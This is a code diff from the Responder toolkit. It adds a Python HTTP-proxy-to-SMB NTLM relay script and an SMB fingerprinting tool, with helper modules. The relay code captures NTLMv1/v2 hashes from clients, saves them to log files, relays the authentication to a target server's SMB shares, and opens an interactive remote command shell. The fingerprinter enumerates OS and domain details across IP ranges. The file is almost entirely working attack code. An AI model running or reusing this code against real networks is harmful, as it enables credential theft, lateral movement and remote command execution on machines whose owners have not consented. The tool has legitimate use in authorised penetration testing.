 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
 # (at your option) any later version.
 #
 # This program is distributed in the hope that it will be useful,
 # but WITHOUT ANY WARRANTY; without even the implied warranty of
 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 # GNU General Public License for more details.
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import sys, re, os, logging, warnings, thread, optparse, time
 from HTTPRelayPacket import *
 from Finger import RunFinger
 sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../../')))
 from socket import *
 __version__ = "0.2"
 def UserCallBack(op, value, dmy, parser):
    args=[]
    for arg in parser.rargs:
        if arg[0] != "-":
            args.append(arg)
    if getattr(parser.values, op.dest):
        args.extend(getattr(parser.values, op.dest))
    setattr(parser.values, op.dest, args)
 parser = optparse.OptionParser(usage="python %prog -t10.20.30.40 -u Administrator lgandx admin", version=__version__, prog=sys.argv[0])
 parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
 parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay")
 options, args = parser.parse_args()
 if options.TARGET is None:
    print "\n-t Mandatory option is missing, please provide a target.\n"
    parser.print_help()
    exit(-1)
 if options.UserToRelay is None:
    print "\n-u Mandatory option is missing, please provide a username to relay.\n"
    parser.print_help()
    exit(-1)
 UserToRelay = options.UserToRelay
 Host = options.TARGET, 445
 Cmd = ""
 def ShowWelcome():
    print '\n\033[1;34mResponder Proxy Auth to SMB NTLMv1/2 Relay 0.2\nSupporting NTLMv1 and NTLMv2.'
    print 'Send bugs/hugs/comments to: laurent.gaffie@gmail.com'
    print 'Usernames to relay (-u) are case sensitive.'
    print 'To kill this script hit CRTL-C or <Enter>.\033[1;31m\n'
    print 'Use this script in combination with Responder.py for best results.'
    print 'Do not to use Responder.py with -P set. This tool does the same'
    print 'than -P but with cross-protocol NTLM relay. Always target a box ' 
    print 'joined to the target domain,not the PDC as SMB signing is enabled '
    print 'by default. For optimal pwnage and stealthiness, launch Responder '
    print 'with these 2 options only: -rv \033[0m'
    print '\n\033[1;34mRelaying credentials only for these users:\033[32m'
    print UserToRelay
    print '\033[0m\n'
 ShowWelcome()
 Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../../"
 Logs = logging
 Logs.basicConfig(filemode="a",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
 try:
    RunFinger(Host[0])
 except:
    print "The host %s seems to be down or port 445 down."%(Host[0])
    sys.exit(1)
 # Function used to write captured hashs to a file.
 def WriteData(outfile, data, user):
 	if not os.path.isfile(outfile):
 		with open(outfile,"w") as outf:
 			outf.write(data + '\n')
 		return
 	with open(outfile,"r") as filestr:
 		if re.search(user.encode('hex'), filestr.read().encode('hex')):
 			return False
 		elif re.search(re.escape("$"), user):
 			return False
 	with open(outfile,"a") as outf2:
 		outf2.write(data + '\n')
 #Function used to verify if a previous auth attempt was made.
 def ReadData(Outfile, Client, User, Domain, Target, cmd):
    try:
        with open(Logs_Path+"logs/"+Outfile,"r") as filestr:
            Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure"
            if re.search(Login.encode('hex'), filestr.read().encode('hex')):
                print "[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User)
                return True
            else:
                return False
    except:
        raise
 def ParseHTTPHash(data, key, client):
 	LMhashLen    = struct.unpack('<H',data[12:14])[0]
 	LMhashOffset = struct.unpack('<H',data[16:18])[0]
 	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
 	NthashLen    = struct.unpack('<H',data[20:22])[0]
 	NthashOffset = struct.unpack('<H',data[24:26])[0]
 	NTHash       = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
 	UserLen      = struct.unpack('<H',data[36:38])[0]
 	UserOffset   = struct.unpack('<H',data[40:42])[0]
 	User         = data[UserOffset:UserOffset+UserLen].replace('\x00','')
 	if NthashLen == 24:
 		HostNameLen     = struct.unpack('<H',data[46:48])[0]
 		HostNameOffset  = struct.unpack('<H',data[48:50])[0]
 		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
 		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex"))
 		WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
                print "[+] Received NTLMv1 hash from: %s"%(client)
                if User in UserToRelay:
                        print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
                        if ReadData("SMBRelay-Session.txt", client, User, HostName, Host[0], cmd=None):
                           return None, None
                        else:
                	   return User, HostName
                else:
                        print "[+] Username: %s not in target list, dropping connection."%(User)
                	return None, None
 	if NthashLen > 24:
 		NthashLen      = 64
 		DomainLen      = struct.unpack('<H',data[28:30])[0]
 		DomainOffset   = struct.unpack('<H',data[32:34])[0]
 		Domain         = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
 		HostNameLen    = struct.unpack('<H',data[44:46])[0]
 		HostNameOffset = struct.unpack('<H',data[48:50])[0]
 		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
 		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:])
 		WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
                print "[+] Received NTLMv2 hash from: %s"%(client)
                if User in UserToRelay:
                        print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
                        if ReadData("SMBRelay-Session.txt", client, User, Domain, Host[0], cmd=None):
                           return None, None
                        else:
                	   return User, Domain
                else:
                        print "[+] Username: %s not in target list, dropping connection."%(User)
                	return None, None
 def longueur(payload):
 	return struct.pack(">i", len(''.join(payload)))
 def ExtractChallenge(data):
    SecBlobLen = struct.unpack("<h", data[43:45])[0]
    if SecBlobLen < 255:
       Challenge = data[102:110]
    if SecBlobLen > 255:
       Challenge = data[106:114]
    print "[+] Setting up HTTP Proxy with SMB challenge:", Challenge.encode("hex")
    return Challenge
 def ExtractRawNTLMPacket(data):
    SecBlobLen = struct.unpack("<h", data[43:45])[0]
    SSP = re.search("NTLMSSP", data[47:]).start()
    RawNTLM = data[47+SSP:47+SecBlobLen]
    return RawNTLM
 def GetSessionResponseFlags(data):
    if data[41:43] == "\x01\x00":
       print "[+] Server returned session positive, but as guest. Psexec should fail even if authentication was successful.."
 def get_command():
    global Cmd
    Cmd = ""
    while len(Cmd) is 0:
       Cmd = raw_input("C:\\Windows\\system32\\:#")
 def SMBKeepAlive(s, data, NextEcho = 20):
    while True:
        head = SMBHeader(cmd="\x2b",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
        t = SMBEcho()
        packet1 = str(head)+str(t)
        buffer1 = longueur(packet1)+packet1  
        s.send(buffer1)
        data = s.recv(2048)
        time.sleep(NextEcho)
 def HTTPProxyRelay():
    so = socket(AF_INET,SOCK_STREAM)
    so.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
    try:
        so.bind(('0.0.0.0', 3128))
        so.listen(10)
        s = socket(AF_INET, SOCK_STREAM)
        s.connect(Host)  
        s.settimeout(30)
    except:
        "Cannot bind to port 3128, something else must be using it."
        sys.exit(1)
    try:
        while True:
            conn, addr = so.accept()
            data = conn.recv(4096)
            if not data: 
               break
            NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
 	    Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
 	    if NTLM_Auth:
 	        Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
 		if Packet_NTLM == "\x01":
                        ## SMB Block. Relay PROXY NTLM NEGO to target srv.
                        h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x07\xc8")
                        n = SMBNegoCairo(Data = SMBNegoCairoData())
                        n.calculate()
                        packet0 = str(h)+str(n)
                        buffer0 = longueur(packet0)+packet0
                        s.send(buffer0)
                        smbdata = s.recv(2048)
                        ##Session Setup AndX Request, NTLMSSP_NEGOTIATE
                        if smbdata[8:10] == "\x72\x00":
                           head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00")
                           t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
                           t.calculate() 
                           packet1 = str(head)+str(t)
                           buffer1 = longueur(packet1)+packet1  
                           s.send(buffer1)
                           smbdata = s.recv(2048)
                        ## Send HTTP Proxy 
 			Buffer_Ans = WPAD_NTLM_Challenge_Ans()
 			Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
                        key = ExtractChallenge(data)#Grab challenge key
 			conn.send(str(Buffer_Ans))
                        data = conn.recv(8092)
                        NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
                        Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
 		        if Packet_NTLM == "\x03":
 			   NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
                           Username, Domain = ParseHTTPHash(NTLM_Auth, key, addr[0])
                           if Username is not None:
                              ##Got the ntlm message 3, send it over to SMB.
                              head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",uid=smbdata[32:34],mid="\x03\x00")
                              t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
                              t.calculate()
                              packet1 = str(head)+str(t)
                              buffer1 = longueur(packet1)+packet1  
                              print "[+] SMB Session Auth sent."
                              s.send(buffer1)
                              smbdata = s.recv(2048)
   	                      return smbdata, s, addr[0], Username, Domain
                           else:
                              return None, None, None, None, None
 	    else:
                Response = WPAD_Auth_407_Ans()
 	        conn.send(str(Response))
                data = conn.recv(4096)
    except:
        return None
 def RunPsExec(Host):
    GetCredentials = HTTPProxyRelay()
    if GetCredentials  == None:
        return False
    data, s, clientIP, Username, Domain = GetCredentials
    if data[8:10] == "\x73\x6d":
        print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target.\n[+] Hashes were saved anyways in Responder/logs/ folder."
        Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
    if data[8:10] == "\x73\x8d":
        print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n"
        Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
    ## First, check if user has admin privs on C$:    
    ## Tree Connect
    if data[8:10] == "\x73\x00":
        print "[+] Authenticated.\n"
        GetSessionResponseFlags(data)#Verify if the target returned a guest session.
        head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
        t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$")
        t.calculate() 
        packet1 = str(head)+str(t)
        buffer1 = longueur(packet1)+packet1  
        s.send(buffer1)
        data = s.recv(2048)
    ## Fail Handling.
    if data[8:10] == "\x75\x22":
        print "[+] Tree Connect AndX denied. SMB Signing is likely mandatory on the target, or this is a low privileged user.\n[+] Hashes were saved anyways in Responder/logs/ folder."
        return False
    ## Tree Connect
    if data[8:10] == "\x75\x00":
        print "[+] Looks good, "+Username+" has admin rights on C$."
        head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
        t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
        t.calculate() 
        packet1 = str(head)+str(t)
        buffer1 = longueur(packet1)+packet1  
        s.send(buffer1)
        data = s.recv(2048)
    ## NtCreateAndx
    if data[8:10] == "\x75\x00":
        print "[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
    while True:
        if data[8:10] == "\x75\x00":
            #thread.start_new_thread(SMBKeepAlive, (s,data, 15)) #keep it alive every 15 secs.
            thread.start_new_thread(get_command, ())
            while Cmd == "":
                pass
            if Cmd == "exit":
               sys.exit(1)
            data = RunCmd(data, s, clientIP, Username, Domain, Cmd, Logs, Host)
        if data is None:
           print "\033[1;31m\nSomething went wrong, the server dropped the connection. Make sure to clean the server (\\Windows\\Temp\\)\033[0m\n"
        if data[8:10] == "\x2d\x34":#Confirmed with OpenAndX that no file remains.
            head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
            t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
            t.calculate() 
            packet1 = str(head)+str(t)
            buffer1 = longueur(packet1)+packet1  
            s.send(buffer1)
            data = s.recv(2048)
            Cmd2 = raw_input("C:\\Windows\\system32\\:#")
            while len(Cmd2) is 0:
                Cmd2 = raw_input("C:\\Windows\\system32\\:#")
            if Cmd2 == "exit":
               sys.exit(1)
            data = RunCmd(data, s, clientIP, Username, Domain, Cmd2, Logs, Host)
    if data[8:10] == "\x2d\x00":
       print "[*] File still exist (Windows\\Temp\\Results.txt), server's not playing nicely."
 def main():
    try:
        num_thrd = 1
        while num_thrd > 0:
            RunPsExec(Host)
            time.sleep(1)
    except KeyboardInterrupt:
        exit()
 if __name__ == '__main__':
    try:
        main()
    except:
        raise
--- a/tools/RelayHTTPSMB/odict.py
+++ b/tools/RelayHTTPSMB/odict.py
@@ -0,0 +1,117 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
 # (at your option) any later version.
 #
 # This program is distributed in the hope that it will be useful,
 # but WITHOUT ANY WARRANTY; without even the implied warranty of
 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 # GNU General Public License for more details.
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from UserDict import DictMixin
 class OrderedDict(dict, DictMixin):
    def __init__(self, *args, **kwds):
        if len(args) > 1:
            raise TypeError('expected at most 1 arguments, got %d' % len(args))
        try:
            self.__end
        except AttributeError:
            self.clear()
        self.update(*args, **kwds)
    def clear(self):
        self.__end = end = []
        end += [None, end, end]
        self.__map = {}
        dict.clear(self)
    def __setitem__(self, key, value):
        if key not in self:
            end = self.__end
            curr = end[1]
            curr[2] = end[1] = self.__map[key] = [key, curr, end]
        dict.__setitem__(self, key, value)
    def __delitem__(self, key):
        dict.__delitem__(self, key)
        key, prev, next = self.__map.pop(key)
        prev[2] = next
        next[1] = prev
    def __iter__(self):
        end = self.__end
        curr = end[2]
        while curr is not end:
            yield curr[0]
            curr = curr[2]
    def __reversed__(self):
        end = self.__end
        curr = end[1]
        while curr is not end:
            yield curr[0]
            curr = curr[1]
    def popitem(self, last=True):
        if not self:
            raise KeyError('dictionary is empty')
        if last:
            key = reversed(self).next()
        else:
            key = iter(self).next()
        value = self.pop(key)
        return key, value
    def __reduce__(self):
        items = [[k, self[k]] for k in self]
        tmp = self.__map, self.__end
        del self.__map, self.__end
        inst_dict = vars(self).copy()
        self.__map, self.__end = tmp
        if inst_dict:
            return self.__class__, (items,), inst_dict
        return self.__class__, (items,)
    def keys(self):
        return list(self)
    setdefault = DictMixin.setdefault
    update = DictMixin.update
    pop = DictMixin.pop
    values = DictMixin.values
    items = DictMixin.items
    iterkeys = DictMixin.iterkeys
    itervalues = DictMixin.itervalues
    iteritems = DictMixin.iteritems
    def __repr__(self):
        if not self:
            return '%s()' % (self.__class__.__name__,)
        return '%s(%r)' % (self.__class__.__name__, self.items())
    def copy(self):
        return self.__class__(self)
    @classmethod
    def fromkeys(cls, iterable, value=None):
        d = cls()
        for key in iterable:
            d[key] = value
        return d
    def __eq__(self, other):
        if isinstance(other, OrderedDict):
            return len(self)==len(other) and \
                   min(p==q for p, q in  zip(self.items(), other.items()))
        return dict.__eq__(self, other)
    def __ne__(self, other):
        return not self == other
--- a/tools/SMBFinger/Finger.py
+++ b/tools/SMBFinger/Finger.py
@@ -0,0 +1,234 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
 # (at your option) any later version.
 #
 # This program is distributed in the hope that it will be useful,
 # but WITHOUT ANY WARRANTY; without even the implied warranty of
 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 # GNU General Public License for more details.
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import re,sys,socket,struct
 from socket import *
 from odict import OrderedDict
 import optparse
 __version__ = "0.3"
 parser = optparse.OptionParser(usage='python %prog -i 10.10.10.224\nor:\npython %prog -i 10.10.10.0/24', version=__version__, prog=sys.argv[0])
 parser.add_option('-i','--ip',             action="store",      help="Target IP address or class C", dest="TARGET", metavar="10.10.10.224", default=None)
 options, args = parser.parse_args()
 Timeout = 0.3
 Host = options.TARGET
 class Packet():
    fields = OrderedDict([
    ])
    def __init__(self, **kw):
        self.fields = OrderedDict(self.__class__.fields)
        for k,v in kw.items():
            if callable(v):
                self.fields[k] = v(self.fields[k])
            else:
                self.fields[k] = v
    def __str__(self):
        return "".join(map(str, self.fields.values()))
 def longueur(payload):
    length = struct.pack(">i", len(''.join(payload)))
    return length
 class SMBHeader(Packet):
    fields = OrderedDict([
        ("proto",      "\xff\x53\x4d\x42"),
        ("cmd",        "\x72"),
        ("error-code", "\x00\x00\x00\x00" ),
        ("flag1",      "\x00"),
        ("flag2",      "\x00\x00"),
        ("pidhigh",    "\x00\x00"),
        ("signature",  "\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("reserved",   "\x00\x00"),
        ("tid",        "\x00\x00"),
        ("pid",        "\x00\x00"),
        ("uid",        "\x00\x00"),
        ("mid",        "\x00\x00"),
    ])
 class SMBNego(Packet):
    fields = OrderedDict([
        ("Wordcount", "\x00"),
        ("Bcc", "\x62\x00"),
        ("Data", "")
    ])
    def calculate(self):
        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
 class SMBNegoData(Packet):
    fields = OrderedDict([
        ("BuffType","\x02"),
        ("Dialect", "NT LM 0.12\x00"),
    ])
 class SMBSessionFingerData(Packet):
    fields = OrderedDict([
        ("wordcount", "\x0c"),
        ("AndXCommand", "\xff"),
        ("reserved","\x00" ),
        ("andxoffset", "\x00\x00"),
        ("maxbuff","\x04\x11"),
        ("maxmpx", "\x32\x00"),
        ("vcnum","\x00\x00"),
        ("sessionkey", "\x00\x00\x00\x00"),
        ("securitybloblength","\x4a\x00"),
        ("reserved2","\x00\x00\x00\x00"),
        ("capabilities", "\xd4\x00\x00\xa0"),
        ("bcc1",""),
        ("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
    ])
    def calculate(self):
        self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
 ##Now Lanman
 class SMBHeaderLanMan(Packet):
    fields = OrderedDict([
        ("proto", "\xff\x53\x4d\x42"),
        ("cmd", "\x72"),
        ("error-code", "\x00\x00\x00\x00" ),
        ("flag1", "\x08"),
        ("flag2", "\x01\xc8"),
        ("pidhigh", "\x00\x00"),
        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("reserved", "\x00\x00"),
        ("tid", "\x00\x00"),
        ("pid", "\x3c\x1b"),
        ("uid", "\x00\x00"),
        ("mid", "\x00\x00"),
    ])
 class SMBNegoDataLanMan(Packet):
    fields = OrderedDict([
        ("Wordcount", "\x00"),
        ("Bcc", "\x54\x00"),
        ("BuffType","\x02"),
        ("Dialect", "NT LM 0.12\x00"),
    ])
    def calculate(self):
        CalculateBCC = str(self.fields["BuffType"])+str(self.fields["Dialect"])
        self.fields["Bcc"] = struct.pack("<h",len(CalculateBCC))
 #####################
 def atod(a): 
    return struct.unpack("!L",inet_aton(a))[0]
 def dtoa(d): 
    return inet_ntoa(struct.pack("!L", d))
 def OsNameClientVersion(data):
 	try:
 		length = struct.unpack('<H',data[43:45])[0]
 		OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
 		return OsVersion, ClientVersion
 	except:
 	 	return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
 def GetHostnameAndDomainName(data):
 	try:
 		DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
 		return Hostname, DomainJoined
 	except:
 	 	return "Could not get Hostname.", "Could not get Domain joined"
 def DomainGrab(Host):
    s = socket(AF_INET, SOCK_STREAM)
    try:
       s.settimeout(Timeout)
       s.connect(Host)
    except:
       print "Host down or port close, skipping"
       pass
    try:
       h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
       n = SMBNegoDataLanMan()
       n.calculate()
       packet0 = str(h)+str(n)
       buffer0 = longueur(packet0)+packet0
       s.send(buffer0)
       data = s.recv(2048)
       if data[8:10] == "\x72\x00":
          return GetHostnameAndDomainName(data)
    except:
       pass 
 def SmbFinger(Host):
    s = socket(AF_INET, SOCK_STREAM)
    try:
       s.settimeout(Timeout)
       s.connect(Host)
    except:
       print "Host down or port close, skipping"
       pass
    try:     
       h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
       n = SMBNego(Data = SMBNegoData())
       n.calculate()
       packet0 = str(h)+str(n)
       buffer0 = longueur(packet0)+packet0
       s.send(buffer0)
       data = s.recv(2048)
       if data[8:10] == "\x72\x00":
          head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
          t = SMBSessionFingerData()
          t.calculate() 
          packet0 = str(head)+str(t)
          buffer1 = longueur(packet0)+packet0  
          s.send(buffer1) 
          data = s.recv(2048)
       if data[8:10] == "\x73\x16":
          return OsNameClientVersion(data)
    except:
       pass
 ##################
 #run it
 def ShowResults(Host):
    s = socket(AF_INET, SOCK_STREAM)
    try:
       s.settimeout(Timeout)
       s.connect(Host)
    except:
       return False
    try:
       print "Retrieving information for %s..."%Host[0]
       OsVer, LanManClient = SmbFinger(Host)
       print "Os version: '%s'\nLanman Client: '%s'"%(OsVer, LanManClient)
       Hostname, DomainJoined = DomainGrab(Host)
       print "Machine Hostname: '%s'\nThis machine is part of the '%s' domain\n"%(Hostname, DomainJoined)
    except:
       pass
 def RunFinger(Host):
    m = re.search("/", str(Host))
    if m :
       net,_,mask = Host.partition('/')
       mask = int(mask)
       net = atod(net)
       for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
           ShowResults((host,445))
    else:
       ShowResults((Host,445))   
 RunFinger(Host)
--- a/tools/SMBFinger/odict.py
+++ b/tools/SMBFinger/odict.py
@@ -0,0 +1,106 @@
 from UserDict import DictMixin
 class OrderedDict(dict, DictMixin):
    def __init__(self, *args, **kwds):
        if len(args) > 1:
            raise TypeError('expected at most 1 arguments, got %d' % len(args))
        try:
            self.__end
        except AttributeError:
            self.clear()
        self.update(*args, **kwds)
    def clear(self):
        self.__end = end = []
        end += [None, end, end]
        self.__map = {} 
        dict.clear(self)
    def __setitem__(self, key, value):
        if key not in self:
            end = self.__end
            curr = end[1]
            curr[2] = end[1] = self.__map[key] = [key, curr, end]
        dict.__setitem__(self, key, value)
    def __delitem__(self, key):
        dict.__delitem__(self, key)
        key, prev, next = self.__map.pop(key)
        prev[2] = next
        next[1] = prev
    def __iter__(self):
        end = self.__end
        curr = end[2]
        while curr is not end:
            yield curr[0]
            curr = curr[2]
    def __reversed__(self):
        end = self.__end
        curr = end[1]
        while curr is not end:
            yield curr[0]
            curr = curr[1]
    def popitem(self, last=True):
        if not self:
            raise KeyError('dictionary is empty')
        if last:
            key = reversed(self).next()
        else:
            key = iter(self).next()
        value = self.pop(key)
        return key, value
    def __reduce__(self):
        items = [[k, self[k]] for k in self]
        tmp = self.__map, self.__end
        del self.__map, self.__end
        inst_dict = vars(self).copy()
        self.__map, self.__end = tmp
        if inst_dict:
            return (self.__class__, (items,), inst_dict)
        return self.__class__, (items,)
    def keys(self):
        return list(self)
    setdefault = DictMixin.setdefault
    update = DictMixin.update
    pop = DictMixin.pop
    values = DictMixin.values
    items = DictMixin.items
    iterkeys = DictMixin.iterkeys
    itervalues = DictMixin.itervalues
    iteritems = DictMixin.iteritems
    def __repr__(self):
        if not self:
            return '%s()' % (self.__class__.__name__,)
        return '%s(%r)' % (self.__class__.__name__, self.items())
    def copy(self):
        return self.__class__(self)
    @classmethod
    def fromkeys(cls, iterable, value=None):
        d = cls()
        for key in iterable:
            d[key] = value
        return d
    def __eq__(self, other):
        if isinstance(other, OrderedDict):
            return len(self)==len(other) and \
                   min(p==q for p, q in  zip(self.items(), other.items()))
        return dict.__eq__(self, other)
    def __ne__(self, other):
        return not self == other
 if __name__ == '__main__':
    d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)])
    assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh']
--- a/utils.py
+++ b/utils.py
@@ -21,7 +21,11 @@ import logging
 import socket
 import time
 import settings
 import datetime
 def HTTPCurrentDate():
    Date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
    return Date
 try:
 	import sqlite3
 except:
@@ -39,13 +43,12 @@ def color(txt, code = 1, modifier = 0):
 	return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
 def text(txt):
        stripcolors = re.sub(r'\x1b\[([0-9,A-Z]{1,2}(;[0-9]{1,2})?(;[0-9]{3})?)?[m|K]?', '', txt)
        logging.info(stripcolors)
 	if os.name == 'nt':
 		return txt
 	return '\r' + re.sub(r'\[([^]]*)\]', "\033[1;34m[\\1]\033[0m", txt)
 def textlogging(txt):
 	logging.info(txt)
 def IsOnTheSameSubnet(ip, net):
 	net += '/24'
 	ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
@@ -54,7 +57,6 @@ def IsOnTheSameSubnet(ip, net):
 	mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
 	return (ipaddr & mask) == (netaddr & mask)
 def RespondToThisIP(ClientIp):
 	if ClientIp.startswith('127.0.0.'):
@@ -80,6 +82,12 @@ def RespondToThisName(Name):
 def RespondToThisHost(ClientIp, Name):
 	return RespondToThisIP(ClientIp) and RespondToThisName(Name)
 def RespondWithIPAton():
       if settings.Config.ExternalIP:
               return settings.Config.ExternalIPAton
       else:
               return settings.Config.IP_aton
 def OsInterfaceIsSupported():
 	if settings.Config.Interface != "Not set":
 		return not IsOsX()
@@ -122,6 +130,10 @@ def WriteData(outfile, data, user):
 	with open(outfile,"a") as outf2:
 		outf2.write(data + '\n')
 # Function used to write debug config and network info.
 def DumpConfig(outfile, data):
 	with open(outfile,"a") as dump:
 		dump.write(data + '\n')
 def SaveToDb(result):
 	# Creating the DB if it doesn't exist
@@ -149,7 +161,7 @@ def SaveToDb(result):
 	cursor.text_factory = sqlite3.Binary  # We add a text factory to support different charsets
 	res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND client=? AND LOWER(user)=LOWER(?)", (result['module'], result['type'], result['client'], result['user']))
 	(count,) = res.fetchone()
-
+        
 	if not count:
 		with open(logfile,"a") as outf:
 			if len(result['cleartext']):  # If we obtained cleartext credentials, write them to file
@@ -160,34 +172,41 @@ def SaveToDb(result):
 		cursor.execute("INSERT INTO responder VALUES(datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?)", (result['module'], result['type'], result['client'], result['hostname'], result['user'], result['cleartext'], result['hash'], result['fullhash']))
 		cursor.commit()
        if settings.Config.CaptureMultipleHashFromSameHost:
 		with open(logfile,"a") as outf:
 			if len(result['cleartext']):  # If we obtained cleartext credentials, write them to file
 				outf.write('%s:%s\n' % (result['user'].encode('utf8', 'replace'), result['cleartext'].encode('utf8', 'replace')))
 			else:  # Otherwise, write JtR-style hash string to file
 				outf.write(result['fullhash'].encode('utf8', 'replace') + '\n')
 	if not count or settings.Config.Verbose:  # Print output
 		if len(result['client']):
 			print text("[%s] %s Client   : %s" % (result['module'], result['type'], color(result['client'], 3)))
-                        textlogging("[%s] %s Client   : %s" % (result['module'], result['type'], result['client']))
